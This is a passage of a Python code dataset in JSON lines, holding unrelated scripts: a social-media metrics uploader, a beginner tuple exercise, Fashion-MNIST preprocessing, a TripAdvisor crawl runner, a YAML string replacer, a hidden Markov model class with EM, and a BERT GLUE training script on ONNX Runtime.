twitter_listed_count_list.append(twit_listed)\n\n df = pandas.DataFrame({'date' : date_list, 'name' : name_list, 'instagram_follow_count' : instagram_follow_count_list,\n 'instagram_hashtag_count' : instagram_hashtag_count_list, 'youtube_view_count' : youtube_view_count_list,\n 'youtube_comment_count' : youtube_comment_count_list, 'youtube_subscriber_count' : youtube_subscriber_count_list,\n 'youtube_video_count' : youtube_video_count_list, 'twitter_follower_count' : twitter_follower_count_list,\n 'twitter_favorite_count' : twitter_favorite_count_list, 'twitter_friend_count' : twitter_friends_count_list,\n 'twitter_listed_count' : twitter_listed_count_list})\n\n pandas.DataFrame.to_gbq(df, 'SNS_data.last_test', 'datamingo', if_exists = 'append', chunksize = 10000, verbose = True)\n print(datetime.datetime.now(), 'big query update!', flush=True)","sub_path":"SNS_api/data_to_bigquery_server.py","file_name":"data_to_bigquery_server.py","file_ext":"py","file_size_in_byte":6859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
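The bare `try/except` blocks in the record above record zeros whenever one of the three APIs fails, which makes an outage indistinguishable from a genuine zero count. One hedged alternative is a small retry wrapper with exponential backoff; this is a sketch only, and `with_retries` is an illustrative helper, not part of the original script:

```python
import time

def with_retries(fn, *args, retries=3, backoff=2.0, fallback=None):
    # Call fn(*args); on failure wait backoff, 2*backoff, ... then give up.
    for attempt in range(retries):
        try:
            return fn(*args)
        except Exception as exc:
            print('attempt %d/%d failed: %s' % (attempt + 1, retries, exc), flush=True)
            time.sleep(backoff * (2 ** attempt))
    return fallback

# e.g. instead of the bare try/except around instagram_api:
# insta_follower, insta_hashtag = with_retries(instagram_api, res_list[i], fallback=(0, 0))
```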
+{"seq_id":"77357388","text":"num = (int(input('Digite um número: ')),\n int(input('Digite outro número: ')),\n int(input('Digite mais um número: ')),\n int(input('Digite o último número: ')))\npar = 0\nprint(f'Você digitou os valores: {num}')\nif 9 in num:\n print(f'O valor 9 apareceu {num.count(9)} vezes.')\nelse:\n print(f'O valor 9 não foi digitado')\nif 3 in num :\n print(f'O valor 3 apareceu na {num.index(3)+1}ª posição.')\nelse:\n print(f'O valor 3 não foi digitado.')\nfor i in num:\n if i % 2 == 0:\n par += 1\nprint(f'Os valores pares digitados foram {par}')\n","sub_path":"ex075.py","file_name":"ex075.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"6087205","text":"#Keras supplies many datasets in their library aptly named datasets\nfrom keras.datasets import fashion_mnist #https://keras.io/datasets/\n\n#We store the training and testing images in the following variables\n\n(train_X, train_Y), (test_X, test_Y) = fashion_mnist.load_data()\n\n\nimport numpy as np #for linear algebra\n\n#To see what dimensions I am working with:\nprint(\"Dimension of training input and output\")\nprint(train_X.shape, train_Y.shape)\n#(60000, 28, 28), (60000,)\nprint(\"Dimensions of test input and output\")\nprint(test_X.shape, test_Y.shape)\n#(10000, 28, 28), (10000,)\n\"\"\"\nSo training data is 60000 samples with each sample havinga 28x28 pixel dimension\nand the test data is 10000 samples with the same dimensions\n\nNext we find the number of unique labels in the output using numpy\n\"\"\"\nprint(\"Unique labels to classify and total number of unique lables \")\nprint(np.unique(train_Y), len(np.unique(train_Y)))\n#(array([0,1,2,3,4,5,6,7,8,9]), 10)\n\"\"\"\nThere are 10 total output labels ranging from 0 - 9\nNow we want to reshape the images into a matrix of 28x28x1 to feed the CNN\nand then normalize the data into a float format ranging from 0-1.\n\"\"\"\ntrain_X = train_X.reshape(-1, 28, 28, 1)\ntest_X = test_X.reshape(-1, 28, 28, 1)\n#Reshapes to ((60000, 28, 28, 1), (10000, 28, 28, 1))\n\ntrain_X = train_X.astype('float32')\ntest_X = test_X.astype('float32')\n\ntrain_X = train_X / 255.0\ntest_X = test_X / 255.0\n\n\"\"\"\nNow the NN is not going to understand the labels in the train_Y and test_Y\nthe way they are now, so we must transform the labels into a 'vector'\ni.e if the output label is 1, we want the vector to be [0, 1, 0, 0, 0, 0, 0, 0, 0, 0]\nand if the label is 9 -> [0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n\"\"\"\nfrom keras.utils import to_categorical #https://keras.io/utils/\n#converts an array into a binary class matrix\ntrain_Y_binary = to_categorical(train_Y)\n#Converts all to the binary representation\ntest_Y_binary = to_categorical(test_Y)\n#both have size (N, 10) where N is number of samples - 60000 for train and 10000 for test\n\"\"\"\nAlways important in ML is splitting of the data into two parts, one for training and one for validation\nI choose a 80% to 20% split of training data to validate data respectively\nIn addition, we can randomize the data order with sklearns train_test_split\n\n\"\"\"\nfrom sklearn.model_selection import train_test_split #https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.train_test_split.html\ntrain_X,valid_X,train_label,valid_label = train_test_split(train_X, train_Y_binary, test_size=0.2, random_state=13)\n#train_X.shape: (48000, 28, 28, 1), valid_X.shape: (12000, 28, 28, 1), train_label.shape: (48000, 10), valid_label.shape: (12000, 10)\n#Now we are ready to use the data:\n","sub_path":"initial_data_analysis.py","file_name":"initial_data_analysis.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"524187988","text":"\"\"\"\nThis file reads city names from cities-queue.txt and starts running crawl from the top.\nAfter reading a city name it deletes the line. Hence, the next un-crawled city name comes to the top.\nSo, multiple instances of this script can be run at the same time to increase efficiency.\n\"\"\"\nimport json\nimport os\nfrom urllib.request import urlopen\nfrom general import append_to_file\n\nwith open('cities-queue.txt') as infile:\n characters = 0\n for line in infile:\n wordslist = line.split()\n characters += sum(len(word)+1 for word in wordslist)\n\n\nwhile True:\n city = None\n rf = open(\"run.py-offset-setter.txt\", \"r\")\n offset = int(rf.readline()[9:].strip())\n rf.close()\n\n if offset >= characters:\n break\n\n with open('cities-queue.txt', 'r+') as f:\n while True:\n f.seek(offset, 0)\n line = f.readline()\n offset = offset + len(line)\n\n rf = open(\"run.py-offset-setter.txt\", \"w\")\n rf.write(\"offset = \" + str(offset))\n rf.close()\n\n if not line or line == \"\\n\":\n continue\n\n if line.strip()[0] != \"#\":\n city = line.strip()\n break\n\n city_url_name = city.replace(\" \", \"%20\")\n \"\"\"\n Find document ID from url\n \"\"\"\n url = \"https://www.tripadvisor.in/TypeAheadJson?action=API&query=\" + city_url_name + \"&types=geo&name_\" \\\n \"depth=1&details=true&legacy_format=true&rescue=true&max=8&uiOrigin=Attractions_\" \\\n \"geopicker&source=Attractions_geopicker&searchSessionId=7B739CEC86558248C6D84290316117ED1575889411248ssid&\" \\\n \"scope=1&beforeGeoId=1&afterGeoId=1&startTime=1575892064630\"\n\n json_url = urlopen(url)\n data = json.loads(json_url.read())\n try:\n document_id = data[0].get(\"document_id\")\n except Exception as e:\n document_id = None\n if document_id is None or document_id.isdigit() is False:\n append_to_file(\"list-of-cities-not-found.txt\", city)\n print(\"document_id not found\")\n continue\n print(city + \": Document ID:\" + document_id)\n\n cmd = \"python tripadvis-crawl.py --city=\\\"\" + city + \"\\\" --id=\" + document_id\n os.system(cmd)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"215083333","text":"#Change strings in multiple files \nimport sys\nimport time\n\nfilename=['enable_custom_list_machine.yml','disable_custom_list_machine.yml']\n\n### Backup \nfor i1 in range(len(filename)):\n f1=open(filename[i1],'r')\n m=f1.read()\n f_back=open(filename[i1]+time.strftime(\"_%Y\"),'w')\n for i2 in m:\n f_back.write(i2)\n \n n=len(m)\n for i4 in range(n): \n#Next statement checks 11 characters as we are searching for string 'are'\n if m[i4:i4+11]=='text_change':\n m_new=m.replace('text_change',sys.argv[1])\n d2=open(filename[i1],'w')\n for i5 in m_new:\n d2.write(i5)\n\n\n\n\n","sub_path":"zango/Notif_Auto2/replace_string.py","file_name":"replace_string.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"309272409","text":"import numpy as np\nimport numpy.random as npr\n\nfrom scipy.special import logsumexp\n\nfrom sds_numpy.initial import CategoricalInitState\nfrom sds_numpy.transitions import StationaryTransition\nfrom sds_numpy.observations import GaussianObservation\n\nfrom sds_numpy.utils import ensure_args_are_viable_lists\nfrom sds_numpy.cython.hmm_cy import forward_cy, backward_cy\n\nfrom tqdm import trange\n\nto_c = lambda arr: np.copy(arr, 'C')\\\n if not arr.flags['C_CONTIGUOUS'] else arr\n\n\nclass HMM:\n\n def __init__(self, nb_states, dm_obs, dm_act=0,\n init_state_prior={}, trans_prior={}, obs_prior={},\n init_state_kwargs={}, trans_kwargs={}, obs_kwargs={}):\n\n self.nb_states = nb_states\n self.dm_obs = dm_obs\n self.dm_act = dm_act\n\n self.init_state = CategoricalInitState(self.nb_states, prior=init_state_prior, **init_state_kwargs)\n self.transitions = StationaryTransition(self.nb_states, prior=trans_prior, **trans_kwargs)\n self.observations = GaussianObservation(self.nb_states, self.dm_obs, self.dm_act,\n prior=obs_prior, **obs_kwargs)\n\n @property\n def params(self):\n return self.init_state.params, \\\n self.transitions.params, \\\n self.observations.params\n\n @params.setter\n def params(self, value):\n self.init_state.params = value[0]\n self.transitions.params = value[1]\n self.observations.params = value[2]\n\n @ensure_args_are_viable_lists\n def initialize(self, obs, act=None, **kwargs):\n self.init_state.initialize()\n if hasattr(self, 'init_observation'):\n self.init_observation.initialize(obs)\n self.transitions.initialize(obs, act)\n self.observations.initialize(obs, act)\n\n def permute(self, perm):\n self.init_state.permute(perm)\n self.transitions.permute(perm)\n self.observations.permute(perm)\n\n def log_priors(self):\n logprior = 0.0\n logprior += self.init_state.log_prior()\n logprior += self.transitions.log_prior()\n logprior += self.observations.log_prior()\n return logprior\n\n @ensure_args_are_viable_lists\n def log_likelihoods(self, obs, act=None):\n loginit = self.init_state.log_init()\n logtrans = self.transitions.log_transition(obs, act)\n logobs = self.observations.log_likelihood(obs, act)\n return loginit, logtrans, logobs\n\n def log_norm(self, obs, act=None):\n loglikhds = self.log_likelihoods(obs, act)\n _, norm = self.forward(*loglikhds)\n return np.sum(np.hstack(norm))\n\n def log_probability(self, obs, act=None):\n return self.log_norm(obs, act) + self.log_priors()\n\n def forward(self, loginit, logtrans, logobs, logctl=None, cython=True):\n if logctl is None:\n logctl = []\n for _logobs in logobs:\n logctl.append(np.zeros((_logobs.shape[0], self.nb_states)))\n\n alpha, norm = [], []\n for _logobs, _logctl, _logtrans in zip(logobs, logctl, logtrans):\n T = _logobs.shape[0]\n _alpha = np.zeros((T, self.nb_states))\n _norm = np.zeros((T, ))\n\n if cython:\n forward_cy(to_c(loginit), to_c(_logtrans),\n to_c(_logobs), to_c(_logctl),\n to_c(_alpha), to_c(_norm))\n else:\n for k in range(self.nb_states):\n _alpha[0, k] = loginit[k] + _logobs[0, k]\n _norm[0] = logsumexp(_alpha[0], axis=-1, keepdims=True)\n _alpha[0] = _alpha[0] - _norm[0]\n\n _aux = np.zeros((self.nb_states,))\n for t in range(1, T):\n for k in range(self.nb_states):\n for j in range(self.nb_states):\n _aux[j] = _alpha[t - 1, j] + _logtrans[t - 1, j, k]\n _alpha[t, k] = logsumexp(_aux) + _logobs[t, k] + _logctl[t, k]\n\n _norm[t] = logsumexp(_alpha[t], axis=-1, keepdims=True)\n _alpha[t] = _alpha[t] - _norm[t]\n\n alpha.append(_alpha)\n norm.append(_norm)\n 
return alpha, norm\n\n def backward(self, loginit, logtrans, logobs,\n logctl=None, scale=None, cython=True):\n if logctl is None:\n logctl = []\n for _logobs in logobs:\n logctl.append(np.zeros((_logobs.shape[0], self.nb_states)))\n\n beta = []\n for _logobs, _logctl, _logtrans, _scale in zip(logobs, logctl, logtrans, scale):\n T = _logobs.shape[0]\n _beta = np.zeros((T, self.nb_states))\n\n if cython:\n backward_cy(to_c(loginit), to_c(_logtrans),\n to_c(_logobs), to_c(_logctl),\n to_c(_beta), to_c(_scale))\n else:\n for k in range(self.nb_states):\n _beta[T - 1, k] = 0.0 - _scale[T - 1]\n\n _aux = np.zeros((self.nb_states,))\n for t in range(T - 2, -1, -1):\n for k in range(self.nb_states):\n for j in range(self.nb_states):\n _aux[j] = _logtrans[t, k, j] + _beta[t + 1, j]\\\n + _logobs[t + 1, j] + _logctl[t + 1, j]\n _beta[t, k] = logsumexp(_aux) - _scale[t]\n\n beta.append(_beta)\n return beta\n\n def posterior(self, alpha, beta):\n return [np.exp(_alpha + _beta - logsumexp(_alpha + _beta, axis=1, keepdims=True))\n for _alpha, _beta in zip(alpha, beta)]\n\n def joint_posterior(self, alpha, beta, loginit, logtrans, logobs, logctl=None):\n if logctl is None:\n logctl = []\n for _logobs in logobs:\n logctl.append(np.zeros((_logobs.shape[0], self.nb_states)))\n\n zeta = []\n for _logobs, _logctl, _logtrans, _alpha, _beta in\\\n zip(logobs, logctl, logtrans, alpha, beta):\n _zeta = _alpha[:-1, :, None] + _beta[1:, None, :] + _logtrans\\\n + _logobs[1:, :][:, None, :] + _logctl[1:, :][:, None, :]\n\n _zeta -= _zeta.max((1, 2))[:, None, None]\n _zeta = np.exp(_zeta)\n _zeta /= _zeta.sum((1, 2))[:, None, None]\n\n zeta.append(_zeta)\n return zeta\n\n @ensure_args_are_viable_lists\n def viterbi(self, obs, act=None):\n loginit, logtrans, logobs = self.log_likelihoods(obs, act)[0:3]\n\n delta = []\n z = []\n for _logobs, _logtrans in zip(logobs, logtrans):\n T = _logobs.shape[0]\n\n _delta = np.zeros((T, self.nb_states))\n _args = np.zeros((T, self.nb_states), np.int64)\n _z = np.zeros((T, ), np.int64)\n\n for t in range(T - 2, -1, -1):\n _aux = _logtrans[t, :] + _delta[t + 1, :] + _logobs[t + 1, :]\n _delta[t, :] = np.max(_aux, axis=1)\n _args[t + 1, :] = np.argmax(_aux, axis=1)\n\n _z[0] = np.argmax(loginit + _delta[0, :] + _logobs[0, :], axis=0)\n for t in range(1, T):\n _z[t] = _args[t, _z[t - 1]]\n\n delta.append(_delta)\n z.append(_z)\n\n return delta, z\n\n def estep(self, obs, act=None):\n loglikhds = self.log_likelihoods(obs, act)\n alpha, norm = self.forward(*loglikhds)\n beta = self.backward(*loglikhds, scale=norm)\n gamma = self.posterior(alpha, beta)\n zeta = self.joint_posterior(alpha, beta, *loglikhds)\n\n return gamma, zeta\n\n def mstep(self, gamma, zeta,\n obs, act,\n init_mstep_kwargs,\n trans_mstep_kwargs,\n obs_mstep_kwargs, **kwargs):\n\n if hasattr(self, 'init_observation'):\n self.init_observation.mstep(gamma, obs)\n\n self.init_state.mstep(gamma, **init_mstep_kwargs)\n self.transitions.mstep(zeta, obs, act, **trans_mstep_kwargs)\n self.observations.mstep(gamma, obs, act, **obs_mstep_kwargs)\n\n @ensure_args_are_viable_lists\n def em(self, train_obs, train_act=None, nb_iter=50, prec=1e-4,\n init_mstep_kwargs={}, trans_mstep_kwargs={},\n obs_mstep_kwargs={}, **kwargs):\n\n process_id = kwargs.get('process_id', 0)\n\n train_lls = []\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n last_train_ll = train_ll\n\n pbar = trange(nb_iter, position=process_id)\n pbar.set_description(\"#{}, ll: {:.5f}\".format(process_id, train_lls[-1]))\n\n for _ in 
pbar:\n gamma, zeta = self.estep(train_obs, train_act)\n self.mstep(gamma, zeta, train_obs, train_act,\n init_mstep_kwargs,\n trans_mstep_kwargs,\n obs_mstep_kwargs,\n **kwargs)\n\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n\n pbar.set_description(\"#{}, ll: {:.5f}\".format(process_id, train_lls[-1]))\n\n if abs(train_ll - last_train_ll) < prec:\n break\n else:\n last_train_ll = train_ll\n\n return train_lls\n\n @ensure_args_are_viable_lists\n def earlystop_em(self, train_obs, train_act=None, nb_iter=50, prec=1e-4,\n init_mstep_kwargs={}, trans_mstep_kwargs={}, obs_mstep_kwargs={},\n test_obs=None, test_act=None, **kwargs):\n\n assert test_obs is not None and test_act is not None\n\n process_id = kwargs.get('process_id', 0)\n\n nb_train = np.vstack(train_obs).shape[0]\n nb_test = np.vstack(test_obs).shape[0]\n nb_all = nb_train + nb_test\n\n train_lls = []\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n last_train_ll = train_ll\n\n test_lls = []\n test_ll = self.log_norm(test_obs, test_act)\n test_lls.append(test_ll)\n last_test_ll = test_ll\n\n all_ll = last_train_ll + last_test_ll\n\n score = (all_ll - train_ll) / (nb_all - nb_train)\n last_score = score\n\n pbar = trange(nb_iter, position=process_id)\n pbar.set_description(\"#{}, train_ll: {:.5f}, test_ll: {:.5f},\"\n \" score: {:.5f}\".format(process_id, train_ll, test_ll, score))\n\n for _ in pbar:\n gamma, zeta = self.estep(train_obs, train_act)\n self.mstep(gamma, zeta, train_obs, train_act,\n init_mstep_kwargs,\n trans_mstep_kwargs,\n obs_mstep_kwargs,\n **kwargs)\n\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n\n test_ll = self.log_norm(test_obs, test_act)\n test_lls.append(test_ll)\n\n all_ll = train_ll + test_ll\n score = (all_ll - train_ll) / (nb_all - nb_train)\n\n pbar.set_description(\"#{}, train_ll: {:.5f}, test_ll: {:.5f},\"\n \"score: {:.5f}\".format(process_id, train_ll, test_ll, score))\n\n if abs(score - last_score) < prec:\n break\n else:\n last_score = score\n\n return train_lls\n\n @ensure_args_are_viable_lists\n def mean_observation(self, obs, act=None):\n loglikhds = self.log_likelihoods(obs, act)\n alpha, norm = self.forward(*loglikhds)\n beta = self.backward(*loglikhds, scale=norm)\n gamma = self.posterior(alpha, beta)\n\n mean_obs = self.observations.smooth(gamma, obs, act)\n return mean_obs\n\n @ensure_args_are_viable_lists\n def filter(self, obs, act=None):\n logliklhds = self.log_likelihoods(obs, act)\n alpha, _ = self.forward(*logliklhds)\n belief = [np.exp(_alpha - logsumexp(_alpha, axis=1, keepdims=True))\n for _alpha in alpha]\n return belief\n\n def sample(self, act=None, horizon=None):\n state = []\n obs = []\n\n for n in range(len(horizon)):\n _act = np.zeros((horizon[n], self.dm_act)) if act is None else act[n]\n _obs = np.zeros((horizon[n], self.dm_obs))\n _state = np.zeros((horizon[n],), np.int64)\n\n _state[0] = self.init_state.sample()\n _obs[0, :] = self.observations.sample(_state[0])\n for t in range(1, horizon[n]):\n _state[t] = self.transitions.sample(_state[t - 1], _obs[t - 1, :], _act[t - 1, :])\n _obs[t, :] = self.observations.sample(_state[t], _obs[t - 1, :], _act[t - 1, :])\n\n state.append(_state)\n obs.append(_obs)\n\n return state, obs\n\n def step(self, obs, act, belief, stoch=True, average=False):\n if stoch:\n # it doesn't make sense to average while sampling\n assert not average\n\n if stoch:\n state = npr.choice(self.nb_states, p=belief)\n nxt_state = self.transitions.sample(state, 
obs, act)\n nxt_obs = self.observations.sample(nxt_state, obs, act)\n else:\n if average:\n nxt_state = None\n\n # average over transitions and belief space\n _logtrans = np.squeeze(self.transitions.log_transition(obs, act)[0])\n _trans = np.exp(_logtrans - logsumexp(_logtrans, axis=1, keepdims=True))\n\n _zeta = _trans.T @ belief\n _nxt_belief = _zeta / _zeta.sum()\n\n nxt_obs = np.zeros((1, self.dm_obs))\n for k in range(self.nb_states):\n nxt_obs += _nxt_belief[k] * self.observations.mean(k, obs, act)\n else:\n state = np.argmax(belief)\n nxt_state = self.transitions.likeliest(state, obs, act)\n nxt_obs = self.observations.mean(nxt_state, obs, act)\n\n return nxt_state, nxt_obs\n\n def forcast(self, hist_obs=None, hist_act=None, nxt_act=None,\n horizon=None, stoch=False, average=False):\n\n nxt_state = []\n nxt_obs = []\n\n for n in range(len(horizon)):\n _hist_obs = hist_obs[n]\n _hist_act = hist_act[n]\n\n _nxt_act = np.zeros((horizon[n], self.dm_act)) if nxt_act is None else nxt_act[n]\n _nxt_obs = np.zeros((horizon[n] + 1, self.dm_obs))\n _nxt_state = np.zeros((horizon[n] + 1,), np.int64)\n\n _belief = self.filter(_hist_obs, _hist_act)[0][-1, ...]\n\n if stoch:\n _nxt_state[0] = npr.choice(self.nb_states, p=_belief)\n _nxt_obs[0, :] = _hist_obs[-1, ...]\n for t in range(horizon[n]):\n _nxt_state[t + 1] = self.transitions.sample(_nxt_state[t], _nxt_obs[t, :], _nxt_act[t, :])\n _nxt_obs[t + 1, :] = self.observations.sample(_nxt_state[t + 1], _nxt_obs[t, :], _nxt_act[t, :])\n else:\n if average:\n # return empty discrete state when mixing\n _nxt_state = None\n\n _nxt_obs[0, :] = _hist_obs[-1, ...]\n for t in range(horizon[n]):\n\n # average over transitions and belief space\n _logtrans = np.squeeze(self.transitions.log_transition(_nxt_obs[t, :], _nxt_act[t, :])[0])\n _trans = np.exp(_logtrans - logsumexp(_logtrans, axis=1, keepdims=True))\n\n # update belief\n _zeta = _trans.T @ _belief\n _belief = _zeta / _zeta.sum()\n\n # average observations\n for k in range(self.nb_states):\n _nxt_obs[t + 1, :] += _belief[k] * self.observations.mean(k, _nxt_obs[t, :], _nxt_act[t, :])\n else:\n _nxt_state[0] = np.argmax(_belief)\n _nxt_obs[0, :] = _hist_obs[-1, ...]\n for t in range(horizon[n]):\n _nxt_state[t + 1] = self.transitions.likeliest(_nxt_state[t], _nxt_obs[t, :], _nxt_act[t, :])\n _nxt_obs[t + 1, :] = self.observations.mean(_nxt_state[t + 1], _nxt_obs[t, :], _nxt_act[t, :])\n\n nxt_state.append(_nxt_state)\n nxt_obs.append(_nxt_obs)\n\n return nxt_state, nxt_obs\n\n @ensure_args_are_viable_lists\n def kstep_mse(self, obs, act, horizon=1, stoch=False, average=False):\n\n from sklearn.metrics import mean_squared_error,\\\n explained_variance_score, r2_score\n\n mse, smse, evar = [], [], []\n for _obs, _act in zip(obs, act):\n _hist_obs, _hist_act, _nxt_act = [], [], []\n _target, _prediction = [], []\n\n _nb_steps = _obs.shape[0] - horizon\n for t in range(_nb_steps):\n _hist_obs.append(_obs[:t + 1, :])\n _hist_act.append(_act[:t + 1, :])\n _nxt_act.append(_act[t: t + horizon, :])\n\n _hr = [horizon for _ in range(_nb_steps)]\n _, _forcast = self.forcast(hist_obs=_hist_obs, hist_act=_hist_act,\n nxt_act=_nxt_act, horizon=_hr, stoch=stoch,\n average=average)\n\n for t in range(_nb_steps):\n _target.append(_obs[t + horizon, :])\n _prediction.append(_forcast[t][-1, :])\n\n _target = np.vstack(_target)\n _prediction = np.vstack(_prediction)\n\n _mse = mean_squared_error(_target, _prediction)\n _smse = 1. 
- r2_score(_target, _prediction, multioutput='variance_weighted')\n _evar = explained_variance_score(_target, _prediction, multioutput='variance_weighted')\n\n mse.append(_mse)\n smse.append(_smse)\n evar.append(_evar)\n\n return np.mean(mse), np.mean(smse), np.mean(evar)\n","sub_path":"sds_numpy/hmm.py","file_name":"hmm.py","file_ext":"py","file_size_in_byte":17930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
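For context, a minimal usage sketch of the class above (assuming the `sds_numpy` package and its Cython extensions are installed): draw a few trajectories from one HMM, then fit a fresh model to them with EM.

```python
from sds_numpy.hmm import HMM

true_model = HMM(nb_states=3, dm_obs=2)
states, obs = true_model.sample(horizon=[200] * 5)   # five sampled trajectories

learned = HMM(nb_states=3, dm_obs=2)
learned.initialize(obs)
lls = learned.em(obs, nb_iter=25, prec=1e-4)         # per-iteration log-likelihoods
print('final log-likelihood:', lls[-1])
```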
+{"seq_id":"226295170","text":"# -------------------------------------------------------------------------\n# Portions Copyright (c) Microsoft Corporation. All rights reserved.\n# --------------------------------------------------------------------------\n# Copyright 2020 The HuggingFace Inc. team. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport numpy as np\nimport mlflow\nimport time\nfrom typing import Dict, Callable\nimport json\nimport os\n\n# from dataclasses import dataclass, field\nimport transformers\nfrom transformers import (\n AutoModelForSequenceClassification,\n AutoTokenizer,\n EvalPrediction,\n Trainer,\n HfArgumentParser,\n TrainingArguments,\n)\nfrom glue_datasets import (\n load_encoded_glue_dataset,\n num_labels_from_task,\n load_metric_from_task,\n)\n\n# pretraining\nfrom transformers import AutoConfig\nfrom transformers import DataCollatorForLanguageModeling\n\n# Azure ML imports - could replace this with e.g. wandb or mlflow\nfrom transformers.integrations import MLflowCallback\n\n# Pytorch Profiler\nimport torch.profiler.profiler as profiler\nfrom transformers import TrainerCallback\n\n# Onnx Runtime for training\nfrom optimum.onnxruntime import ORTTrainer, ORTTrainingArguments\n\n\ndef construct_compute_metrics_function(task: str) -> Callable[[EvalPrediction], Dict]:\n metric = load_metric_from_task(task)\n\n if task != \"stsb\":\n\n def compute_metrics_function(eval_pred: EvalPrediction) -> Dict:\n predictions, labels = eval_pred\n predictions = np.argmax(predictions, axis=1)\n return metric.compute(predictions=predictions, references=labels)\n\n else:\n\n def compute_metrics_function(eval_pred: EvalPrediction) -> Dict:\n predictions, labels = eval_pred\n predictions = predictions[:, 0]\n return metric.compute(predictions=predictions, references=labels)\n\n return compute_metrics_function\n\n\nif __name__ == \"__main__\":\n parser = HfArgumentParser(ORTTrainingArguments)\n parser.add_argument(\"--task\", default=\"cola\", help=\"name of GLUE task to compute\")\n parser.add_argument(\"--model_checkpoint\", default=\"bert-large-uncased\")\n parser.add_argument(\"--tensorboard_log_dir\", default=\"/outputs/runs/\")\n\n training_args, args = parser.parse_args_into_dataclasses()\n\n transformers.logging.set_verbosity_debug()\n\n task: str = args.task.lower()\n\n num_labels = num_labels_from_task(task)\n\n tokenizer = AutoTokenizer.from_pretrained(args.model_checkpoint, use_fast=True)\n context_length = 512\n\n model_config = AutoConfig.from_pretrained(\n args.model_checkpoint,\n vocab_size=len(tokenizer),\n n_ctx=context_length,\n bos_token_id=tokenizer.bos_token_id,\n eos_token_id=tokenizer.eos_token_id,\n )\n model = AutoModelForSequenceClassification.from_config(model_config)\n\n encoded_dataset_train, encoded_dataset_eval = load_encoded_glue_dataset(\n task=task, tokenizer=tokenizer\n )\n\n compute_metrics = construct_compute_metrics_function(args.task)\n\n # Create path for logging to tensorboard\n my_logs = os.environ[\"PWD\"] + 
args.tensorboard_log_dir\n\n # Custom HuggingFace trainer callback used for starting/stopping the pytorch profiler\n class ProfilerCallback(TrainerCallback):\n def on_train_begin(self, args, state, control, model=None, **kwargs):\n self.prof = profiler.profile(\n schedule=profiler.schedule(wait=2, warmup=1, active=3, repeat=2),\n activities=[\n profiler.ProfilerActivity.CPU,\n profiler.ProfilerActivity.CUDA,\n ],\n on_trace_ready=profiler.tensorboard_trace_handler(my_logs),\n record_shapes=True,\n with_stack=True,\n profile_memory=True,\n )\n self.prof.start()\n\n def on_train_end(self, args, state, control, model=None, **kwargs):\n self.prof.stop()\n\n def on_step_begin(self, args, state, control, model=None, **kwargs):\n self.prof.step()\n\n # Initialize huggingface trainer. This trainer will internally execute the training loop\n trainer = ORTTrainer(\n model=model,\n args=training_args,\n train_dataset=encoded_dataset_train,\n eval_dataset=encoded_dataset_eval,\n # data_collator=data_collator,\n tokenizer=tokenizer,\n compute_metrics=compute_metrics,\n callbacks=[ProfilerCallback],\n feature=\"sequence-classification\",\n )\n\n trainer.pop_callback(MLflowCallback)\n\n start = time.time()\n\n # pretrian the model!\n result = trainer.train()\n\n print(f\"Time: {result.metrics['train_runtime']:.2f}\")\n print(f\"Samples/second: {result.metrics['train_samples_per_second']:.2f}\")\n print(\"Training...\")\n\n mlflow.log_metric(\n \"time/epoch\", (time.time() - start) / 60 / training_args.num_train_epochs\n )\n\n print(\"Evaluation...\")\n\n trainer.evaluate()\n","sub_path":"best-practices/largescale-deep-learning/Training/Bert-Pretrain/src/pretrain_glue_ORT.py","file_name":"pretrain_glue_ORT.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
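The profiler schedule in the record above is worth unpacking: with `wait=2, warmup=1, active=3, repeat=2`, each cycle spans six steps, and only steps 3-5 and 9-11 (0-indexed) are actually recorded. A standalone sketch of the same pattern outside the trainer, using only `torch.profiler`:

```python
import torch
import torch.profiler as profiler

x = torch.randn(256, 256)
with profiler.profile(
    schedule=profiler.schedule(wait=2, warmup=1, active=3, repeat=2),
    activities=[profiler.ProfilerActivity.CPU],
    on_trace_ready=profiler.tensorboard_trace_handler('./runs'),
) as prof:
    for step in range(12):   # two cycles of (wait 2, warmup 1, active 3)
        y = x @ x            # the workload being profiled
        prof.step()          # advance the schedule, as on_step_begin does above
```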
